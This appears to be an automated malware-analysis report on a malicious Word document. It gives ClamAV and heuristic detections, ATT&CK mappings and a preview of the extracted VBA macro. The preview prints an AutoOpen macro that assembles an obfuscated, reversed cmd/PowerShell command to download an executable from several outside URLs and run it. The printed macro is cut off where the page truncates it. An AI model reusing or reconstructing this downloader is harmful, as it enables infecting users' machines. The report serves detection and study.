MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command constructed from obfuscated string concatenations, which appears to be designed to download and execute a second-stage payload. The specific command executed is "cmd /V: /c set YE^G^6= }}h t^a t^}^;kaer^b;^l t$ m^et^I^-^ek^o vnI^;)l t^$^ ,s^P^z$(^el^i^Fd^a^o^l nwoD.Rt^w^$^{^yrt^{)l^W$ ni^ s^P^z$(h".
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6686950-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6686950-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4641 bytes |
SHA-256: 8e5f83010515affc19ee2cd363944e7baab96996df0d15d1bf9232b9aa26218e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KFJmINMHJTXIn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const KELlUXcHc = 0
Dim QLhJo(5)
QLhJo(0) = MidB(tCRGYktm, 596, 330)
QLhJo(1) = MidB(tCRGYktm, 596, 330)
QLhJo(2) = MidB(tCRGYktm, 596, 330)
QLhJo(3) = MidB(tCRGYktm, 596, 330)
QLhJo(4) = Right(lUfXwIT, 351)
Dim lHqET(2)
lHqET(0) = Right(lUfXwIT, 351)
lHqET(1) = Mid(rZMVBzoK, 777, 56)
Dim YLItCp(3)
YLItCp(0) = Right(lUfXwIT, 351)
YLItCp(1) = Right(lUfXwIT, 351)
YLItCp(2) = Left(YfdtqPuT, 860)
Shell@ FZcAMjNAQap + LkVFOJNzBs + mVifEmNBXwpJMz, CInt(KELlUXcHc)
Dim PQiHp(2)
PQiHp(0) = Right(lUfXwIT, 351)
PQiHp(1) = MidB(tCRGYktm, 596, 330)
Dim EkMUOw(2)
EkMUOw(0) = Right(lUfXwIT, 351)
EkMUOw(1) = Right(lUfXwIT, 351)
End Sub
Attribute VB_Name = "KLbiQYKAjvUzP"
Function FZcAMjNAQap()
Dim SKBbrE(3)
SKBbrE(0) = Mid(rZMVBzoK, 777, 56)
SKBbrE(1) = Mid(rZMVBzoK, 777, 56)
SKBbrE(2) = Left(YfdtqPuT, 860)
Dim cTCJRR(4)
cTCJRR(0) = Left(YfdtqPuT, 860)
cTCJRR(1) = Right(lUfXwIT, 351)
cTCJRR(2) = MidB(tCRGYktm, 596, 330)
cTCJRR(3) = MidB(tCRGYktm, 596, 330)
WkHNzoi = Format(Chr(16 + 1 + 18 + 9 + 55)) + "md /V:/" + Format(Chr(11 + 0 + 12 + 6 + 38)) + Format(Chr(5 + 0 + 5 + 3 + 21)) + "^se^" + "t YE^G^6=^ " + " ^ ^ ^ ^ ^ }}^{h" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "t^" + "a" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^}^;ka^er^b;^l" + Format(Chr(11 + 0 + 12 + 6 + 38)) + "^t$" + "^ m^et^I^-^ek^o" + "vnI^;)l" + Format(Chr(11 + 0 + 12 + 6 + 38)) + "t^$^ ,s^" + "P^z$(^el^i^Fd^a^o^l" + "nwoD.Rt^w^$^{^yrt^{)l^L" + "W$ ni^ s^P^z$(h" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "a^ero^f" + "^;^'^e^xe" + "^.'+^LLE^$^+'^\'" + "^+" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^ilb^u^p:vne^$^=^l" + Format(Chr(11 + 0 + 12 + 6 + 38)) + "t$"
Dim OHnEV(3)
OHnEV(0) = Left(YfdtqPuT, 860)
OHnEV(1) = Mid(rZMVBzoK, 777, 56)
OHnEV(2) = Left(YfdtqPuT, 860)
Dim UZMSs(3)
UZMSs(0) = MidB(tCRGYktm, 596, 330)
UZMSs(1) = Right(lUfXwIT, 351)
UZMSs(2) = Left(YfdtqPuT, 860)
Dim mEURrJ(2)
mEURrJ(0) = Mid(rZMVBzoK, 777, 56)
mEURrJ(1) = Left(YfdtqPuT, 860)
Dim pzabMw(3)
pzabMw(0) = Mid(rZMVBzoK, 777, 56)
pzabMw(1) = Mid(rZMVBzoK, 777, 56)
pzabMw(2) = MidB(tCRGYktm, 596, 330)
lVuQGrD = "^;^'^8^06^' ^= L^L^E" + "^$;)^'^@^'(til^" + "p^S.^'" + "^eq^aEN^U^2^yB^x/^mo" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^.ren^o^dul^gorih^ave" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "//:p^tt" + "h@5N^A^ln^a^dY/^" + "m^o" + Format(Chr(16 + 1 + 18 + 9 + 55)) + ".10^1oil^of//^:^ptt^h^@^" + "Qz9L^s6S/^lp^.nol^aso^t^ua" + "dn^ar^g//^:ptth^@^Z^qj5^yFr" + "/^m^o" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^"
Dim naHsM(2)
naHsM(0) = Mid(rZMVBzoK, 777, 56)
naHsM(1) = Left(YfdtqPuT, 860)
Dim OXCDDq(3)
OXCDDq(0) = Right(lUfXwIT, 351)
OXCDDq(1) = Right(lUfXwIT, 351)
OXCDDq(2) = MidB(tCRGYktm, 596, 330)
zTqfXDEhLtE = ".^sbal^ts^e^t" + "^p^i//:^" + "pt^th@G^zn^ZX^k" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "A/pj.t^my^m//^" + ":^ptth'^=^l^LW$^;tn^ei^l" + Format(Chr(11 + 0 + 12 + 6 + 38)) + "be^W^.^t^eN ^t" + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^e^jb^" + "o-^wen^=Rt" + "^w$ llehsr^e^wo^p&&^for /^L %^" + "b ^in (^36^4;" + "-^1;0)^d^o ^"
Dim QOPGtp(3)
QOPGtp(0) = Left(YfdtqPuT, 860)
QOPGtp(1) = Mid(rZMVBzoK, 777, 56)
QOPGtp(2) = Mid(rZMVBzoK, 777, 56)
Dim BwFBz(4)
BwFBz(0) = MidB(tCRGYktm, 596, 330)
BwFBz(1) = Mid(rZMVBzoK, 777, 56)
BwFBz(2) = Right(lUfXwIT, 351)
BwFBz(3) = Mid(rZMVBzoK, 777, 56)
Dim BYGdzR(4)
BYGdzR(0) = Right(lUfXwIT, 351)
BYGdzR(1) = Left(YfdtqPuT, 860)
BYGdzR(2) = MidB(tCRGYktm, 596, 330)
BYGdzR(3) = Right(lUfXwIT, 351)
hviDZGaqoja = "se^t nq4" + "=!nq4!!YE^G^6:~%^b,1!" + "&&^i^f %^b=^=^0 " + Format(Chr(16 + 1 + 18 + 9 + 55)) + "^al^l %" + "nq4:^*nq^4^!^=" + "%" + Format(Chr(5 + 0 + 5 + 3 + 21)) + ""
FZcAMjNAQap = WkHNzoi + lVuQGrD + zTqfXDEhLtE + hviDZGaqoja
Dim zGdCFl(3)
zGdCFl(0) = Mid(rZMVB
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.